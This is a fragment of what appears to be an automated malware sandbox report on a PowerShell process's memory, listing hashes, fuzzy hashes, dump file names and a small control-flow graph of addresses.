                                                              • Opcode Fuzzy Hash: 37eb0f9dd2c73a8fd17d7bb6dd4a6edd2fb73aa65e84e0b96131b5d8e449842f
                                                              • Instruction Fuzzy Hash: 0C913931B0DB854FDB5ADB2888A59657BE1EF6B30070901EED489CB1A3D929FC46C781

                                                              Control-flow Graph

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3219023005.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34850000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 1A_L
                                                              • API String ID: 0-1522723599
                                                              • Opcode ID: b90e1f140991584861a03d12e386854c025359e3dc491130bbbe490997916567
                                                              • Instruction ID: 1defac1f908cd8cf65e8a82280af348930eb4faa3e99428d07a6ea0f777cece8
                                                              • Opcode Fuzzy Hash: b90e1f140991584861a03d12e386854c025359e3dc491130bbbe490997916567
                                                              • Instruction Fuzzy Hash: 9671C231B0DA4A4FDB99DB1CC4A592577E2EF6B30470502AED449CB6A2D925FC82C781

                                                              Control-flow Graph

                                                               control_flow_graph (7 nodes):
                                                               • Node 365: 7ffd348535ee-7ffd348535fb
                                                               • Node 366: 7ffd348535fd-7ffd34853607
                                                               • Node 367: 7ffd3485360b
                                                               • Node 368: 7ffd34853609
                                                               • Node 369: 7ffd34853627-7ffd34853656
                                                               • Node 371: 7ffd34853610-7ffd34853625
                                                               • Node 375: 7ffd3485365d-7ffd3485366f
                                                               • Edges: 365->366, 365->367, 366->368, 366->369, 367->371, 368->371, 369->375, 371->369
                                                              Memory Dump Source
                                                              • Source File: 00000018.00000002.3219023005.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_24_2_7ffd34850000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d892b8848c18a93e8f1ba7fed5891c359c3642d7003b26250b600887d42ce965
                                                              • Instruction ID: e49d3578f37fcd6170b462394c278dc3103080caea01e08b39acbdf19e502ebf
                                                              • Opcode Fuzzy Hash: d892b8848c18a93e8f1ba7fed5891c359c3642d7003b26250b600887d42ce965
                                                              • Instruction Fuzzy Hash: 5D110232B0E6894FEB91DB9884A45A87BE1EF5A310F0800FFD54ED7283DA29A845D351